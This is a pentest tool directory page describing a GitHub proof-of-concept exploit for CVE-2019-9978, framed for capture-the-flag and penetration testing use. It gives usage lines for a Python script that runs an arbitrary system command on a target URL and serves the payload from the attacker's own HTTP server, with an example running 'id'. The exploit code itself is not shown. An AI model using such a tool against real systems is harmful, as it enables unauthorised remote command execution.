Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2019-9978 — cve-2019-9978 PoC | Kitploit
Tools/GitHubGitHub/0xmoonrise/cve-2019-9978
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHub0xmoonrise/cve-2019-9978

cve-2019-9978

cve-2019-9978 PoC

View Repository
22 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2019-9978

This is a script that allows exploiting the CVE-2019-9978 vulnerability in a straightforward manner, intended for use in Capture The Flag (CTF) challenges or as a proof of concept for penetration testing.

Prerequisites

  • Python 3
  • Requests library (Install with pip install requests)

Usage

  1. Clone or download this repository.
  2. Open a terminal and navigate to the script's directory.
  3. Run the script with the following options:
root@kitploit:~
   ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
   - `-u` or `--url`: Set the target URL to deliver the payload.
   - `-c` or `--command`: Set the system command to run on the target system.
   - `-l` or `--local`: Set the IP and port for the HTTP server (optional).
  1. The script starts an HTTP server, sends the payload to the target, and displays the result in the terminal.

Example

root@kitploit:~
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345

Disclaimer

This code is for educational and testing purposes only. Unauthorized use on systems without proper authorization is illegal and unethical. Use it responsibly.

Download Tool